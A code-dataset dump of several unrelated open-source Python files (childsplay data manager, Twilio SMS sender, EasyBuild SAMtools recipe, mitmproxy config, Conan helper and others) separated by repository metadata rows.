doc['payload'] = {'id': r['Ensembl Gene ID'],
'species': species_for_payload}
doc['id'] = r['Ensembl Gene ID']
annotation['assembly_name'] = assembly
annotation['chromosome'] = r['Chromosome Name']
annotation['start'] = r['Gene Start (bp)']
annotation['end'] = r['Gene End (bp)']
doc['annotations'].append(annotation)
annotations.append({
"index": {
"_index": "annotations",
"_type": "default",
"_id": doc['id']
}
})
annotations.append(doc)
return annotations
def main():
'''
Get annotations from multiple sources
This helps to implement autocomplete for region search
'''
import argparse
parser = argparse.ArgumentParser(
description="Generate annotations JSON file for multiple species",
epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
human = human_annotations(_HGNC_FILE)
mouse = mouse_annotations(_MOUSE_FILE)
annotations = human + mouse
# Create annotations JSON file
with open('annotations.json', 'w') as outfile:
json.dump(annotations, outfile)
if __name__ == '__main__':
main()
|
mit
| -2,805,111,701,800,776,700
| 31.896194
| 97
| 0.560429
| false
| 3.808894
| false
| false
| false
|
childsplay-mobi/cp-pygame
|
SPDataManager.py
|
1
|
27828
|
# -*- coding: utf-8 -*-
# Copyright (c) 2007-2010 Stas Zykiewicz <stas.zytkiewicz@schoolsplay.org>
#
# SPDataManager.py
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 3 of the GNU General Public License
# as published by the Free Software Foundation. A copy of this license should
# be included in the file GPL-3.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# TODO: what do we do when a error in dbase stuff occurs?
#create logger, logger was configured in SPLogging
import logging
module_logger = logging.getLogger("childsplay.SPDataManager")
import atexit, os, sys, datetime
# Don't do from 'sqlalchemy import *' as SQA has also 'logging' and 'types'
# modules. This is very bad coding practice but they claim to have good reasons
# for it. Those reasons suck of course but I don't have the time to discuss it
# with them. So I will just use practices *I* think are right and which I should
# have used to begin with and that's '*never* do from foo import *'.
# The braindead part of it all is that SQA use 'from sqlalchemy import *' in their
# docs and tutorials :-(
# None the less, SQA is a very good lib.
from SPConstants import ACTIVITYDATADIR
import SPHelpText
from utils import MyError, StopmeException
try:
import sqlalchemy as sqla
import sqlalchemy.orm as sqlorm
except ImportError:
module_logger.exception("No sqlalchemy package found")
raise MyError
try:
import sqlalchemy.exceptions as sqlae
except ImportError:
from sqlalchemy import exc as sqlae
# attempt to prevent sqlalchemy trhowing recursion limit error
sys.setrecursionlimit(2000) # 1000 is the default
from utils import set_locale
#import SPgdm
from SPDataManagerCreateDbase import DbaseMaker
DEBUG = False
DEMO_DT = [{'fortune': 0, 'target': 'demo', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_picture', 'order': 0}, \
{'fortune': 0, 'target': 'demo', 'level': 2, 'group': 'Puzzels', 'cycles': 1,'act_name': 'electro_sp', 'order': 1}, \
{'fortune': 0, 'target': 'demo', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_melody', 'order': 2},\
]
DEFAULT_DT = [{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_picture', 'order': 0},\
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Puzzels', 'cycles': 2,'act_name': 'electro_sp', 'order': 1}, \
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_math', 'order': 2},\
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Puzzels', 'cycles': 2,'act_name': 'numbers_sp', 'order': 3},\
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_sayings', 'order': 4},\
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Korte termijn', 'cycles': 2,'act_name': 'memory_sp', 'order': 5},\
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_picture', 'order': 6}, \
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Puzzels', 'cycles': 2,'act_name': 'findit_sp', 'order': 7}, \
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_melody', 'order': 8}
]
EASY_DT = [{'fortune': 0, 'target': 'Easy', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_picture', 'order': 0},\
{'fortune': 0, 'target': 'Easy', 'level': 2, 'group': 'Puzzels', 'cycles': 3, 'act_name': 'electro_sp', 'order': 1},\
{'fortune': 0, 'target': 'Easy', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_sayings', 'order': 2},\
{'fortune': 0, 'target': 'Easy', 'level': 2, 'group': 'Puzzels', 'cycles': 3, 'act_name': 'puzzle', 'order': 3},\
{'fortune': 0, 'target': 'Easy', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_math', 'order': 4},\
{'fortune': 0, 'target': 'Easy', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_melody', 'order': 5},\
]
HARD_DT = [{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_picture', 'order': 0},\
{'fortune': 0, 'target': 'Hard', 'level': 3, 'group': 'Puzzels', 'cycles': 3, 'act_name': 'electro_sp', 'order': 1},\
{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_sayings', 'order': 2},\
{'fortune': 0, 'target': 'Hard', 'level': 3, 'group': 'Korte termijn', 'cycles': 3,'act_name': 'memory_sp', 'order': 3}, \
{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_history', 'order': 4}, \
{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Korte termijn', 'cycles': 3, 'act_name': 'soundmemory', 'order': 5},\
{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_math', 'order': 6},\
{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Puzzels', 'cycles': 3, 'act_name': 'numbers_sp', 'order': 7},\
{'fortune': 0, 'target': 'Hard', 'level': 3, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_math', 'order': 8},\
{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Puzzels', 'cycles': 3, 'act_name': 'fourrow', 'order': 9},\
{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_melody', 'order': 10}\
]
class DataManager:
"""Class that handles all users data related stuff except the collecting that
should be done by the activity."""
def __init__(self, spgoodies, dbm):
self.logger = logging.getLogger("childsplay.SPDataManager.DataManager")
self.logger.debug("Starting")
self.SPG = spgoodies
self.cmd_options = self.SPG._cmd_options
self.current_user = self.cmd_options.user
self.current_user_id = None
self.COPxml = None# controlpanel stuff
atexit.register(self._cleanup)
self.content_engine, self.user_engine = dbm.get_engines()
self.metadata_contentdb, self.metadata_usersdb = dbm.get_metadatas()
self.all_orms = dbm.get_all_orms()
self.orms_content_db, self.orms_userdb = dbm.get_orms()
self.UserSession = sqlorm.sessionmaker(bind=self.user_engine)
self.ContentSession = sqlorm.sessionmaker(bind=self.content_engine)
# query which language we should use.
orm, session = self.get_orm('spconf', 'user')
row = session.query(orm).filter_by(activity_name = 'language_select')\
.filter_by(key = 'locale').first()
if not row:
language = self.cmd_options.lang
if not language:
language = self.cmd_options.default_language
row = orm(activity_name='language_select', key='locale', value=language, comment='locale used by the core')
session.add(row)
row = orm(activity_name='language_select', key='lang', value=language[:2], comment='language code used by the core')
session.add(row)
session.commit()
session.close()
language = set_locale(language)
elif not self.cmd_options.lang:
language = set_locale(row.value)
else:
language = self.cmd_options.lang
if not language:
language = self.cmd_options.default_language
language = set_locale(language)
self.language = language
self.SPG.localesetting = language
self._check_tables_uptodate()
# query to get all availabe cids, used to check served_content
orm, session = self.get_orm('game_available_content', 'content')
query = session.query(orm)
self.all_ids = [result.CID for result in query.all()]
session.close()
if self.cmd_options.no_login:
self.current_user = 'SPUser'
self._start_gdm_greeter()
elif self.cmd_options.user:
self.current_user = self.cmd_options.user
self._start_gdm_greeter()
elif self.SPG.get_theme() == 'braintrainer':
self.WeAreBTP = True
self._start_btp_screen()
else:
self.WeAreBTP = False
# we don't have a working login screen yet
self.current_user='SPUser'
self._start_gdm_greeter()
def reset(self):
self.UserSession.close_all()
self.ContentSession.close_all()
try:
self.user_engine.dispose()
self.content_engine.dispose()
except:
pass
def _get_language(self):
return self.language
def _check_tables_uptodate(self):
self.logger.debug("_check_tables_uptodate")
reload(SPHelpText)
modules = [x for x in os.listdir(ACTIVITYDATADIR) if '.py' in x and not '.pyc' in x]
# check that all the activities are present in the activity_options table
orm, session = self.get_orm('activity_options', 'user')
if orm == None:
self.logger.error("No activity_options ORM found, dbase corrupt")
raise MyError, "No activity_options ORM found, dbase corrupt"
for m in modules:
m = m[:-3]
query = session.query(orm)
query = query.filter_by(activity = m)
result = query.first()
if not result:
# Not found activity name, set activity name with default values
session.add(orm(m))
session.commit()
session.close()
orm, session = self.get_orm('group_names', 'user')
# make user demo
orm, session = self.get_orm('users', 'user')
result = session.query(orm).filter_by(login_name = 'Demo').first()
if not result:
session.query(orm).filter_by(user_id = 1).delete()
neworm = orm()
neworm.user_id = 1
neworm.first_name = 'Demo'
neworm.last_name = ''
neworm.login_name = 'Demo'
neworm.audio = 50
neworm.usersgroup = 0
neworm.dt_target = 'demo'
session.add(neworm)
session.commit()
session.close()
# check for mandatory DT sequences
orm, session = self.get_orm('dt_sequence', 'user')
query = session.query(orm).filter_by(target = 'demo').all()
if len(query) != len(DEMO_DT):
self.logger.info("demo dt target differs from hardcoded sequence, replacing it")
session.query(orm).filter(orm.target == 'demo').delete()
session.commit()
for row in DEMO_DT:
session.add(orm(**row))
query = session.query(orm).filter_by(target = 'default').all()
if not query:
self.logger.info("default dt target missing, adding a hardcoded sequence.")
session.query(orm).filter(orm.target == 'default').delete()
session.commit()
for row in DEFAULT_DT:
session.add(orm(**row))
session.commit()
session.close()
val = self._get_rcrow('SPDatamanager', 'set_extra_dt_sequences')
if not val or val != 'yes':
# we also set two DT sequences once, user can remove them
orm, session = self.get_orm('dt_sequence', 'user')
query = session.query(orm).filter_by(target = 'Easy').all()
if not query:
self.logger.info("First time Easy dt target missing, adding a hardcoded sequence.")
session.query(orm).filter(orm.target == 'Easy').delete()
session.commit()
for row in EASY_DT:
session.add(orm(**row))
query = session.query(orm).filter_by(target = 'Hard').all()
if not query:
self.logger.info("First time Hard dt target missing, adding a hardcoded sequence.")
session.query(orm).filter(orm.target == 'Hard').delete()
session.commit()
for row in HARD_DT:
session.add(orm(**row))
session.commit()
session.close()
self._set_rcrow('SPDatamanager', 'set_extra_dt_sequences', 'yes', 'flag to check if we already have set the extra dt sequences')
def _cleanup(self):
"""atexit function"""
# Nothing to see here, please move on.
self.reset()
def _start_btp_screen(self):
"""Starts a login screen for the braintrainer plus.
Beaware that this only works on a BTP system as the login and
control panel is a proprietary piece of code and it's not included
in the free versions."""
sys.path.insert(0, './controlpanel_lgpl')
import Start_screen as Ss #@UnresolvedImport
self.SPG.dm = self
ss = Ss.Controller(self.SPG, fullscr=self.cmd_options.fullscreen)
result = ss.get_result()
if result[0] == 'user':
self.current_user = result[1]
self._start_gdm_greeter()
elif result[0] == 'quit':
raise StopmeException, 0
elif result[0] == 'controlpanel':
self.COPxml = result[1]
def are_we_cop(self):
return self.COPxml
def _start_gdm_greeter(self):
"""Will start login screen and stores the login name in the db"""
self.current_user = 'Demo'
if not self.current_user:
g = SPgdm.SPGreeter(self.cmd_options, \
theme=self.cmd_options.theme, \
vtkb=self.SPG.get_virtual_keyboard(), \
fullscr=self.cmd_options.fullscreen)# returns when user hits login button
username = g.get_loginname()
else:
self.logger.debug("Username %s passed as cmdline option, no login screen" % self.current_user)
username = self.current_user
self.logger.debug("Got login: %s" % username)
if not username:
# we always must run under a user name so we use default
username = self.cmd_options.user
self.logger.debug("No login, setting username to default: %s" % username)
# Now that we have a name we first check if it already exists
# get the users table
orm, session = self.get_orm('users', 'user')
query = session.query(orm)
query = query.filter_by(login_name = username)
result = query.first()
if result:
self.logger.debug("found existing username: %s" % result.login_name)
else:
# insert just user_name, NULL for others, the user_id will be generated
session.add(orm(login_name=username, first_name=username, usersgroup='SPusers'))
self.logger.debug("inserted %s" % username)
session.commit()
query = session.query(orm)
query = query.filter_by(login_name = username)
result = query.first()
session.close()
# we must also check if the SPusers group exists.
orm, session = self.get_orm('group_names', 'user')
rows = [row for row in session.query(orm).order_by(orm.group_name).all()]
if not rows:
# we set a first group
neworm = orm()
neworm.group_name = 'SP Group'
session.add(neworm)
session.commit()
session.close()
self.logger.debug("%s has user id %s" % (username, result.user_id))
self.current_user_id = result.user_id
self.current_user = username
def get_username(self):
"""Returns the current user or None if in anonymousmode"""
self.logger.debug("get_username returns:%s" % self.current_user)
if not self.current_user:
return ''
return self.current_user
def get_user_id(self):
return self.current_user_id
def get_user_id_by_loginname(self, username):
"""Returns the user_id.
@username must be the users login name"""
orm, session = self.get_orm('users', 'user')
query = session.query(orm)
query = query.filter_by(login_name = username)
result = query.first()
if not result:
self.logger.warning("No user %s found, expect more trouble :-(" % username)
else:
return result.user_id
def get_user_dbrow_by_loginname(self, username):
"""Returns the user_id.
@username must be the users login name"""
orm, session = self.get_orm('users', 'user')
query = session.query(orm)
query = query.filter_by(login_name = username)
result = query.first()
if not result:
self.logger.warning("No user %s found, expect more trouble :-(" % username)
return
else:
return result
def get_table_names(self):
"""Returns a list with the names (strings) of the SQL tables currently in use."""
tl = self.metadata_usersdb.tables.keys()
return tl
def get_orm(self, tablename, dbase):
try:
t = self.all_orms[tablename]
except KeyError:
self.logger.warning("get_orm No such table: %s" % tablename)
return None,None
else:
if dbase == 'user':
self.user_engine.dispose()
return (t, self.UserSession())
elif dbase == 'content':
self.content_engine.dispose()
return (t, self.ContentSession())
else:
self.logger.warning("no such dbase: %s" % t)
return None, None
def get_served_content_orm(self):
return self.get_orm('served_content', 'user')
def get_table_data_userdb(self, table):
orm, session = self.get_orm(table, 'user')
query = session.query(orm)
return query.all()
def get_mu_sigma(self, name):
orm, session = self.get_orm('activity_options', 'user')
query = session.query(orm)
query = query.filter_by(activity = name)
result = query.first()
if not result:
self.logger.warning("Not found mu and sigma for %s, expect more trouble :-(" % name)
return
return (result.mu, result.sigma)
def get_served_content_mapper(self):
orm, session = self.get_orm('served_content', 'user')
mclass = ServedMapper(orm, session, self.current_user_id, self.current_user)
return mclass
def get_mapper(self, activity, dbase='user'):
self.logger.debug("get_mapper called with activity:%s" % activity)
#self.metadata_usersdb.bind.echo = True
if not activity:
self.logger.debug("anonymous or no activity, returning bogus")
return BogusMapper()
try:
orm, session = self.get_orm(activity, dbase)
mclass = RowMapper(orm, session, self.current_user_id, self.current_user)
except (KeyError, TypeError):
self.logger.warning("Failed to get mapper or activity doesn't have a dbase table : %s, returning bogus mapper" % activity)
return BogusMapper()
else:
return mclass
# Used by multiple acts through spgoodies
def _check_already_served(self, rows, game_theme, minimum=10, all_ids=None):
"""Returns the rows with the ones that are served removed.
When not enough 'free' rows are left it resets all the count_served fields
and return the complete rows list.
all_ids is a list with with possible ids to check against served ids."""
self.logger.debug("_check_already_served called: %s rows offered" % len(rows))
if not all_ids:
all_ids = self.all_ids
orm, session = self.get_served_content_orm()
query = session.query(orm)
query = query.filter_by(user_id = self.current_user_id)
query = query.filter(orm.game_theme_id.in_(game_theme))
query = query.filter(orm.count_served > 0)
allrows = []
served_ids = []
for row in query.all():
allrows.append(row)
served_ids.append(row.CID)
self.logger.debug("already served rows: %s" % len(served_ids))
notserved = set(all_ids).difference(served_ids)
self.logger.debug("found %s not served cids" % len(notserved))
if len(notserved) < minimum:
# Not enough unserved rows
# first we set all the count_served back to 0
query = session.query(orm).filter_by(user_id = self.current_user_id)
query = query.filter(orm.game_theme_id.in_(game_theme))
query.update({orm.count_served: 0}, synchronize_session=False)
session.commit()
session.close()
# we now return all rows as there are now considered not yet served.
self.logger.debug("Resetting served count and returning %s original rows" % len(rows))
return rows
else:
# We must filter the rows by removing nonfree ones
session.close()
rows = [row for row in rows if row.CID in notserved]
self.logger.debug("returning %s rows" % len(rows))
return rows
def _set_rcrow(self, actname, key, value, comment):
orm, session = self.get_orm('spconf', 'user')
query = session.query(orm).filter_by(activity_name = actname).filter_by(key = key).all()
for row in query:
session.delete(row)
row = orm(activity_name=actname, key=key, value=value, comment=comment)
session.add(row)
session.commit()
session.close()
def _get_rcrow(self, actname, key):
val = None
orm, session = self.get_orm('spconf', 'user')
query = session.query(orm).filter_by(activity_name = actname).filter_by(key = key).first()
if query:
val = query.value
session.commit()
session.close()
return val
def _update_rcrow(self, actname, key, val):
orm, session = self.get_orm('spconf', 'user')
query = session.query(orm).filter_by(activity_name = actname).filter_by(key = key).first()
if query:
comm = query.comment
session.commit()
session.close()
self._set_rcrow(actname, key, val, comm)
class RowMapper:
"""DB object used by the core and activity to store data in the dbase
table and row beloging to the current activity.
Don't use this class directly, use the DataManagers get_mapper method."""
def __init__(self, orm, session, user_id=None, current_user=''):
self.logger = logging.getLogger("childsplay.SPDataManager.RowMapper")
self.currentuser = current_user
self.user_id = user_id
self.orm = orm
self.session = session
self.coldata = {}
def insert(self, col, data):
"""collects all the data which should go into a row.
You must call 'commit' to actually store it into the dbase."""
self.logger.debug("insert in %s: %s" % (col, data))
self.coldata[col] = data
def update(self, rowdata):
"""insert a row in to the current table.
@rowdata must be a dictionary with column keys and data values.
You must call 'commit' to actually store it into the dbase."""
self.coldata.update(rowdata)
def commit(self):
"""Flush dbase data to disk.
Returns None on success and True on faillure."""
self.logger.debug("orm %s commit data to dbase" % self.orm._name)
if hasattr(self.orm, 'user_id'):
self.insert('user_id', self.user_id)
self.logger.debug("raw row data:%s" % self.coldata)
self.session.add(self.orm(**self.coldata))
if not self.session:
return
self.session.commit()
self.session.close()
def _get_level_data(self, levelnum=1):
"""Used by maincore"""
query = self.session.query(self.orm)
query.filter_by(level = levelnum)
query.filter_by(user_id = self.user_id)
return query.all()
def _get_start_time(self):
"""Used by the maincore"""
if self.coldata.has_key('start_time'):
return self.coldata['start_time']
def _get_end_time(self):
"""Used by the maincore"""
if self.coldata.has_key('end_time'):
return self.coldata['end_time']
def get_orm(self):
return self.orm
def get_session(self):
return self.session
def close(self):
if not self.session:
return
self.session.close()
class ServedMapper:
"""DB object for the served_content table in the users db.
Used by the core and activity to store data in the dbase
table and row beloging to the current activity.
Don't use this class directly, use the DataManagers get_mapper method."""
def __init__(self, orm, session, user_id=None, current_user=''):
self.logger = logging.getLogger("childsplay.SPDataManager.ServedMapper")
self.currentuser = current_user
self.user_id = user_id
self.orm = orm
self.session = session
self.coldata = {}
def insert(self, cid, gtheme):
"""collects all the data which should go into a row.
You must call 'commit' to actually store it into the dbase."""
self.logger.debug("insert cid:%s game_theme_id:%s" % (cid, gtheme))
svc = self.orm(user_id=self.user_id, CID=cid,\
game_theme_id=gtheme, \
module='', start_time=datetime.datetime.now(), \
count_served=1)
self.session.add(svc)
def commit(self):
if not self.session:
return
self.logger.debug("commiting session")
self.session.commit()
self.session.close()
def close(self):
if not self.session:
return
self.session.close()
class BogusMapper:
"""Bogus mapper class used when we are in anonymousmode"""
def __init__(self):
pass
def __str__(self):
return "BogusMapper"
def __repr__(self):
return "BogusMapper"
def insert(self, col, data):
pass
def insert_row(self, rowdata):
pass
def update(self, rowdata):
pass
def commit(self):
pass
def close(self):
pass
def get_table_column_names(self):
pass
def get_table_data(self):
pass
def delete_row(self, row_id):
pass
def get_table_selection(self, args):
pass
def _get_level_data(self, levelnum=1):
pass
def _get_start_time(self):
return "2000-01-01_00:00:00"
def _get_end_time(self):
return "2000-01-01_00:00:00"
def _get_level_data(self, level=1):
return None
|
gpl-3.0
| -4,219,586,625,147,050,500
| 43.883871
| 141
| 0.582974
| false
| 3.708422
| false
| false
| false
|
liavkoren/djangoDev
|
tests/test_discovery_sample/doctests.py
|
1
|
1192
|
"""
Doctest example from the official Python documentation.
https://docs.python.org/3/library/doctest.html
"""
def factorial(n):
"""Return the factorial of n, an exact integer >= 0.
>>> [factorial(n) for n in range(6)]
[1, 1, 2, 6, 24, 120]
>>> factorial(30)
265252859812191058636308480000000
>>> factorial(-1)
Traceback (most recent call last):
...
ValueError: n must be >= 0
Factorials of floats are OK, but the float must be an exact integer:
>>> factorial(30.1)
Traceback (most recent call last):
...
ValueError: n must be exact integer
>>> factorial(30.0)
265252859812191058636308480000000
It must also not be ridiculously large:
>>> factorial(1e100)
Traceback (most recent call last):
...
OverflowError: n too large
"""
import math
if not n >= 0:
raise ValueError("n must be >= 0")
if math.floor(n) != n:
raise ValueError("n must be exact integer")
if n+1 == n: # catch a value like 1e300
raise OverflowError("n too large")
result = 1
factor = 2
while factor <= n:
result *= factor
factor += 1
return result
|
bsd-3-clause
| -1,257,162,544,663,341,300
| 25.488889
| 72
| 0.605705
| false
| 3.736677
| false
| false
| false
|
ilstreltsov/django-db-mailer
|
dbmail/providers/twilio/sms.py
|
1
|
1317
|
# -*- coding: utf-8 -*-
from httplib import HTTPSConnection
from urllib import urlencode
from base64 import b64encode
from json import loads
from django.conf import settings
from dbmail.providers.prowl.push import from_unicode
from dbmail import get_version
class TwilioSmsError(Exception):
pass
def send(sms_to, sms_body, **kwargs):
"""
Site: https://www.twilio.com/
API: https://www.twilio.com/docs/api/rest/sending-messages
"""
headers = {
"Content-type": "application/x-www-form-urlencoded",
"User-Agent": "DBMail/%s" % get_version(),
'Authorization': 'Basic %s' % b64encode(
"%s:%s" % (
settings.TWILIO_ACCOUNT_SID, settings.TWILIO_AUTH_TOKEN
)).decode("ascii")
}
kwargs.update({
'From': kwargs.pop('sms_from', settings.TWILIO_FROM),
'To': sms_to,
'Body': from_unicode(sms_body)
})
http = HTTPSConnection(kwargs.pop("api_url", "api.twilio.com"))
http.request(
"POST",
"/2010-04-01/Accounts/%s/Messages.json" % settings.TWILIO_ACCOUNT_SID,
headers=headers,
body=urlencode(kwargs))
response = http.getresponse()
if response.status != 201:
raise TwilioSmsError(response.reason)
return loads(response.read()).get('sid')
|
gpl-2.0
| -5,037,271,726,113,817,000
| 25.34
| 78
| 0.626424
| false
| 3.456693
| false
| false
| false
|
JensTimmerman/easybuild-easyblocks
|
easybuild/easyblocks/s/samtools.py
|
1
|
3213
|
# This file is an EasyBuild recipy as per https://github.com/hpcugent/easybuild
#
# Copyright:: Copyright (c) 2012 University of Luxembourg / LCSB
# Author:: Cedric Laczny <cedric.laczny@uni.lu>, Fotis Georgatos <fotis.georgatos@uni.lu>
# License:: MIT/GPL
# File:: $File$
# Date:: $Date$
"""
Easybuild support for building SAMtools (SAM - Sequence Alignment/Map)
"""
import os
import shutil
from easybuild.easyblocks.generic.configuremake import ConfigureMake
class EB_SAMtools(ConfigureMake):
"""
Support for building SAMtools; SAM (Sequence Alignment/Map) format
is a generic format for storing large nucleotide sequence alignments.
"""
def __init__(self, *args, **kwargs):
"""Define lists of files to install."""
super(EB_SAMtools, self).__init__(*args, **kwargs)
self.bin_files = ["bcftools/vcfutils.pl", "bcftools/bcftools", "misc/blast2sam.pl",
"misc/bowtie2sam.pl", "misc/export2sam.pl", "misc/interpolate_sam.pl",
"misc/novo2sam.pl", "misc/psl2sam.pl", "misc/sam2vcf.pl", "misc/samtools.pl",
"misc/soap2sam.pl", "misc/varfilter.py", "misc/wgsim_eval.pl",
"misc/zoom2sam.pl", "misc/md5sum-lite", "misc/md5fa", "misc/maq2sam-short",
"misc/maq2sam-long", "misc/wgsim", "misc/seqtk", "samtools"]
self.lib_files = ["libbam.a"]
self.include_files = ["bam.h", "bam2bcf.h", "bam_endian.h", "bgzf.h", "errmod.h", "faidx.h", "kaln.h",
"khash.h", "klist.h", "knetfile.h", "kprobaln.h", "kseq.h", "ksort.h", "kstring.h",
"razf.h", "sam.h", "sam_header.h", "sample.h"]
def configure_step(self):
"""
No configure
"""
pass
def install_step(self):
"""
Install by copying files to install dir
"""
for (srcdir, dest, files) in [
(self.cfg['start_dir'], 'bin', self.bin_files),
(self.cfg['start_dir'], 'lib', self.lib_files),
(self.cfg['start_dir'], 'include/bam', self.include_files)
]:
destdir = os.path.join(self.installdir, dest)
srcfile = None
try:
os.makedirs(destdir)
for filename in files:
srcfile = os.path.join(srcdir, filename)
shutil.copy2(srcfile, destdir)
except OSError, err:
self.log.error("Copying %s to installation dir %s failed: %s" % (srcfile, destdir, err))
def sanity_check_step(self):
"""Custom sanity check for SAMtools."""
custom_paths = {
'files': ['bin/%s' % x for x in [f.split('/')[-1] for f in self.bin_files]] +
['lib/%s' % x for x in self.lib_files] +
['include/bam/%s' % x for x in self.include_files],
'dirs': []
}
super(EB_SAMtools, self).sanity_check_step(custom_paths=custom_paths)
|
gpl-2.0
| 7,332,690,638,706,083,000
| 41.276316
| 113
| 0.521631
| false
| 3.496192
| false
| false
| false
|
xaxa89/mitmproxy
|
mitmproxy/proxy/config.py
|
1
|
3861
|
import os
import re
from typing import Any
from OpenSSL import SSL, crypto
from mitmproxy import exceptions
from mitmproxy import options as moptions
from mitmproxy import certs
from mitmproxy.net import tcp
from mitmproxy.net import server_spec
CONF_BASENAME = "mitmproxy"
class HostMatcher:
def __init__(self, patterns=tuple()):
self.patterns = list(patterns)
self.regexes = [re.compile(p, re.IGNORECASE) for p in self.patterns]
def __call__(self, address):
if not address:
return False
host = "%s:%s" % address
if any(rex.search(host) for rex in self.regexes):
return True
else:
return False
def __bool__(self):
return bool(self.patterns)
class ProxyConfig:
def __init__(self, options: moptions.Options) -> None:
self.options = options
self.check_ignore = None # type: HostMatcher
self.check_tcp = None # type: HostMatcher
self.certstore = None # type: certs.CertStore
self.client_certs = None # type: str
self.openssl_verification_mode_server = None # type: int
self.configure(options, set(options.keys()))
options.changed.connect(self.configure)
def configure(self, options: moptions.Options, updated: Any) -> None:
if options.add_upstream_certs_to_client_chain and not options.ssl_insecure:
raise exceptions.OptionsError(
"The verify-upstream-cert requires certificate verification to be disabled. "
"If upstream certificates are verified then extra upstream certificates are "
"not available for inclusion to the client chain."
)
if options.ssl_insecure:
self.openssl_verification_mode_server = SSL.VERIFY_NONE
else:
self.openssl_verification_mode_server = SSL.VERIFY_PEER
self.check_ignore = HostMatcher(options.ignore_hosts)
self.check_tcp = HostMatcher(options.tcp_hosts)
self.openssl_method_client, self.openssl_options_client = \
tcp.sslversion_choices[options.ssl_version_client]
self.openssl_method_server, self.openssl_options_server = \
tcp.sslversion_choices[options.ssl_version_server]
certstore_path = os.path.expanduser(options.cadir)
if not os.path.exists(os.path.dirname(certstore_path)):
raise exceptions.OptionsError(
"Certificate Authority parent directory does not exist: %s" %
os.path.dirname(options.cadir)
)
self.certstore = certs.CertStore.from_store(
certstore_path,
CONF_BASENAME
)
if options.client_certs:
client_certs = os.path.expanduser(options.client_certs)
if not os.path.exists(client_certs):
raise exceptions.OptionsError(
"Client certificate path does not exist: %s" %
options.client_certs
)
self.client_certs = client_certs
for c in options.certs:
parts = c.split("=", 1)
if len(parts) == 1:
parts = ["*", parts[0]]
cert = os.path.expanduser(parts[1])
if not os.path.exists(cert):
raise exceptions.OptionsError(
"Certificate file does not exist: %s" % cert
)
try:
self.certstore.add_cert_file(parts[0], cert)
except crypto.Error:
raise exceptions.OptionsError(
"Invalid certificate format: %s" % cert
)
m = options.mode
if m.startswith("upstream:") or m.startswith("reverse:"):
_, spec = server_spec.parse_with_mode(options.mode)
self.upstream_server = spec
|
mit
| 2,367,711,487,147,280,000
| 34.75
| 93
| 0.599068
| false
| 4.219672
| false
| false
| false
|
aldebaran/qibuild
|
python/qitoolchain/conan.py
|
1
|
3506
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2021 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" Create a Conan Package with QiBuild tools """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import os
import tempfile
import qisys.sh
import qisys.command
import qisys.interact
from qisys import ui
class Conan(object):
""" This class create a conan package directory ready to be converted by qitoolchain """
def __init__(self, name, version, channels=None, is_shared=None):
""" Conan class allows us to create a conanfile and compile the library with conan."""
self.name = name
self.version = version
self.channels = channels
self.is_shared = is_shared
self.temp_dir = None
self.conanfile = None
self.package_path = None
def __del__(self):
if self.package_path is not None:
self.clean()
def create(self):
"""
Ask conan channel and parameters to create a conanfile and build it
Tested with: "boost/1.68.0@conan/stable" shared
"""
if not self.channels:
question = "Which conan library do you want to add?"
channel = qisys.interact.ask_string(question, default=True)
self.channels = [channel]
if self.is_shared is None:
question = "Do you want it to be shared (highly recommended)?"
self.is_shared = qisys.interact.ask_yes_no(question, default=True)
self.prepare()
self.write_conanfile()
self.build()
return self.package_path
def prepare(self):
""" Create a temporary directory where to build the library. """
self.temp_dir = tempfile.mkdtemp("-qiconan-{}-{}".format(self.name, self.version))
self.package_path = os.path.join(self.temp_dir, "package")
def write_conanfile(self):
""" Write a default conanfile.txt with standard informations """
assert self.temp_dir, "This build is not ready, please call prepare()"
self.conanfile = os.path.join(self.temp_dir, "conanfile.txt")
ui.info(" * Write conanfile in", self.conanfile)
with open(self.conanfile, "w") as fp:
fp.write("[requires]" + os.linesep)
for c in self.channels:
